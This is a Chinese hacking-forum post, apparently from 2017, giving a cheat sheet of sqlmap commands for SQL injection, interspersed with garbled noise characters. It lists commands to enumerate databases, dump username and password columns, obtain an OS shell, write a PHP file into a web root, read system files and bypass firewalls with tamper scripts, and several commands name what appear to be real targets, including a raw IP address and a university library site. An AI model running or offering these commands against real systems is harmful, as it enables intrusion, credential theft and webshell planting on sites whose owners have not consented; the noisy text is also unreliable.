找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1708|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap( x6 u0 N1 I2 {3 c

! z3 g+ N5 V+ x% supdate :::::>     in the folder   after  execute    following   order : svn update
* @  W% `  P* W8 E6 U/ G/ _
7 O5 n0 P1 n$ o/ L) Wsqlmap.py -r 1.txt --current-db! V9 w6 x8 J/ u( z

; `' T" h! i' Dv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”$ e. s7 ?" _: O% M) D9 }- y

. X" w/ h" j' e& b- X( G==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) & g" ~. l- c: P# X8 V
猜解数据库) r% B& E) A7 E7 O
./sqlmap.py -u "injection-url" --dbs7 L/ h& e+ n$ T- o2 ?
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
% _' t/ c" [& n- T0 V+ E; v7 _1 y4 S6 X) V7 N4 K+ T
猜解表名9 i; E' |) N, x- E, r7 |
./sqlmap.py -u "injection-url" -D database_name --tables
, |; Z9 a; s0 M  w, ]* p6 q4 a
( }( C! |* h) ssqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
! i  x7 z* k7 tsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
8 i; }) H1 O+ v' _
0 @6 ]0 a: {* L' V" ~0 u8 |# Vsqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump$ @  c# R2 W4 ^9 I& h% r
2 e5 i3 V  ]- t" U
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
( }/ H. Q1 ?; A! e- H$ Xsqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
& h5 q+ ]6 R  [. asqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 2 K8 M! p, f. A0 `
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"4 ]7 Q/ M) M% q- ~
8 E7 w) h4 N4 p
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
3 j8 U7 j, O/ Z2 }" x1 z5 a, Vsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
* X  N6 k6 s- Z% B7 K$ O/ isqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
* e9 I% G+ u& |2 h* }* Usqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
9 M" _0 T( ?) {sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump1 |/ Q! v/ p/ r6 @# \8 m% @) V

9 F, P" i* B7 m8 ?' V) k( {sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了2 p- i* j- ~# i' R# o
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"; i3 ]0 G, Q, V) _' l% q9 R
2 `2 k; S& u& b8 K, D* j
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"/ n4 Q* |! p# o" _2 w! J
猜解列名
$ B7 g' p& J2 ~# {! G8 w./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
+ j2 z* y# D: O+ p+ c
' {" f! k; S# gsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" 8 U/ y5 s, f" I3 v  \
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
2 E" ~6 f! j$ p9 m8 wsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
2 r6 z2 F% U# |! |- l: z+ `5 U( \9 e$ S/ V  w( F; E
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
, U- x" l2 T: e1 A9 u( K9 N&submit=Go" y8 d7 c* O7 o  f8 ]; N
猜解值4 `! C5 V1 [/ V2 ]! o* g- L
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
7 _9 m" c% i/ R: X& M" d========================================================/ `( q1 f; r. F4 Q9 |# X! x
搜索表名中包括mana字符的
# P/ p- ?* Y. C* S/sqlmap.py -u "injection-url" -T mana --search
( [; T" v% x  i返回一个交互式sql shell2 Y1 O2 c0 ?. L, e! ]6 s( `
/sqlmap.py -u "injection-url" --sql-shell
; z9 h' R, k. C4 ]+ b读取指定文件(需权限)
3 O/ {  Y) @* d1 ]% z4 o8 Z4 _: y* U/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"8 z3 [2 U2 `4 b  U2 v5 v
查看当前 用户 及 数据库
! U9 G; d* U8 ?" v% n/sqlmap.py -u "injection-url" --current-user --current-db( y" z+ c# O% X' w. Q( X2 A
本地文件 写入 远程目标绝对路径+ [! y" Y4 u* M* k
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
# s2 Z2 t; v' j8 _" I# ksqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py" / u/ v/ m# @3 t2 U5 ]& S

3 h8 z0 [; h' asqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
* X! c( \8 y2 r9 m7 [3 x' ]+ l. v查看某用的权限
8 z- E8 Y9 D! e! x/sqlmap.py -u "injection-url" --privileges -U root
& P1 R7 f2 h4 ^查看当前用户是否为dba
" P2 P/ w' j3 R6 n/sqlmap.py -u "injection-url" --is-dba5 ~" s9 v# _( Z* _' R& s
读取所有数据库用户或指定数据库用户的密码
" V$ ]: m/ o% j2 a4 g1 K0 Vsqlmap.py -r 1.txt --users --passwords
& ]& `0 F0 u; n1 t- e7 csqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
4 A% S1 }) P, H  ]8 g& j1 k2 l) d" b& X' g* w  r
/sqlmap.py -u "injection-url" --passwords -U root
7 C5 ]% y- y' o! P+ C) W# d* s9 _" G
--start&&--stop 与 --first&&--last 的区别
" g: W$ k9 J8 z/ @; b. u& X/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)0 I# S5 I6 F9 M
% p4 D% h# o, t, u
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)+ R& l$ ~0 s" ~/ c: m
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables, i2 y0 L# O) @2 v% t; r% D
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns9 c5 [4 ~5 K( u: \
! O" y; c. a9 D" K; G1 S
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)6 _( |. q$ t: a
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"0 q1 h- @! h' }, \' x

# i1 ~0 C. Y7 o0 R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表